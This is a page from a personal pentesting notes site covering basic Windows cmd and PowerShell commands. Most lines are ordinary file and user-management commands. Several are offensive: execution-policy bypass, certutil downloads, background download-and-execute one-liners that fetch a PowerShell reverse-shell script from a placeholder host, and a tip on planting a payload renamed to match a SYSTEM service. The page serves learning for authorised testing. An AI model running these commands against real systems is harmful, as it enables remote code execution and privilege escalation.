yuyudhn's notes
  • About
  • 🚉QUICKSTART
    • Prerequisite
    • Reconnaissance
    • Exploitation
    • Post Exploitation
    • ⛈️Misc
  • 🪟Active Directory
    • Basic Command
    • Enumeration
      • PowerView
    • Service Exploitation
      • LDAP
      • SMB
        • MS17-010
      • MSSQL
    • Privilege Escalation
      • Unquoted Service Path
      • UAC Bypass
      • Token Abuse
    • Post Exploitation
      • Tunneling with Ligolo-ng
    • Credential Hunting
      • Group Policy Preferences
      • DPAPI
  • MITRE ATT&CK
    • Defense Evasion
      • Physical Attack: Remove EDR
      • AMSI Bypass
    • Credential Access
      • Dump SAM Hashes via Registry
  • 🐧Linux
    • Misc
    • Linux Post Exploitation
    • Linux Password Hunting
  • 🐚Backdoor Stuff
    • Simple PHP Webshell
    • MSFvenom Generate Payload
  • 📳Mobile Pentest: iOS
    • iOS Penetration Testing
    • Objection
  • 🕸️Web Application
    • Common Applications
      • Tomcat
      • Joomla
    • SSTI
    • File Inclusion
    • XSS
    • Misc
  • 🖊️Machine Writeup
    • HackTheBox
      • Perfection
      • Pilgrimage
      • PC
      • Shoppy
      • GoodGames
      • Photobomb
      • Support
Powered by GitBook
On this page
  • Basic PowerShell
  • Check All Available Powershell Command
  • Copy & Move
  • Rename
  • Download
  • Download and Execute
  • Restart and Shutdown
  • Convert to Base64
  • Privileges, User, and Groups

Was this helpful?

  1. Active Directory

Basic Command

The basic of Command Prompt and PowerShell

PreviousMiscNextEnumeration

Last updated 7 months ago

Was this helpful?

This note was created when I was not very familiar with the Windows environment. I didn't know how to restart the machine from the command line, copy files, or import PowerShell scripts, etc.

Basic PowerShell

Enter powershell with Execution Policy Bypass

powershell -ep bypass

Or, if you already inside powershell session, you can set Execution Policy with this command:

Set-ExecutionPolicy Bypass -Scope CurrentUser

Load powershell script function into memory with dot sourcing:

. .\PowerView.ps1

Import module to powershell:

import-module .\Powerspolit.psd1

Check All Available Powershell Command

Get-Command -Name "*Invoke*"
Get-Command
Get-Command

Copy & Move

How to copy file:

copy source.exe destination.exe

How to copy directory:

xcopy C:\source_dir D:\dest_dir /E /I /Y

Explanation:

  • /E – Copies all subdirectories, including empty ones.

  • /I – If the destination does not exist and copying more than one file, this option assumes that the destination must be a directory.

  • /Y – Suppresses prompting to confirm you want to overwrite an existing destination file.

How to Move File or Directory

move payload.exe C:\temp\service.exe

Rename

Sometimes, after found service run as SYSTEM user and writable by low user, you can drop payload to the directory and rename the payload to match the service name.

ren Payload.exe Service.exe

Download

certutil.exe

certutil -urlcache -split -f https://example.com/example.txt example.txt

powershell.exe: Invoke-WebRequest

iwr -Uri "http://172.16.8.1:9005/PowerView.ps1" -OutFile "PowerView.ps1"

Download and Execute

powershell.exe: Invoke-Expression

iex ((New-Object Net.WebClient).DownloadString('http://example.local/Invoke-PowerShellTcpOneLine.ps1'))

Or, from cmd.exe to powershell.exe

powershell.exe -NoP -ExecutionPolicy Bypass -Command "iex ((New-Object Net.WebClient).DownloadString('http://example.local/Invoke-PowerShellTcpOneLine.ps1'))"

Or, use start /B to run the command in background.

start /B powershell.exe -NoP -ExecutionPolicy Bypass -Command "iex ((New-Object Net.WebClient).DownloadString('http://example.local/Invoke-PowerShellTcpOneLine.ps1'))"

Restart and Shutdown

Shutdown now:

shutdown /s /t 0 /f

Restart now:

shutdown /r /t 0 /f

Convert to Base64

[convert]::ToBase64String((Get-Content -path "20230908145747_BloodHound.zip" -Encoding byte))

Privileges, User, and Groups

User stuff:

whoami /all
whoami /priv
whoami /group
net user
net user asuka

Check Local Group using Command Prompt:

net localgroup
net localgroup Administrators

Check group member

Get-LocalGroupMember -Group "Administrators"
Get-LocalGroupMember -Group "Administrators" |  Select-Object *
whoami /all
Get-LocalGroupMember
🪟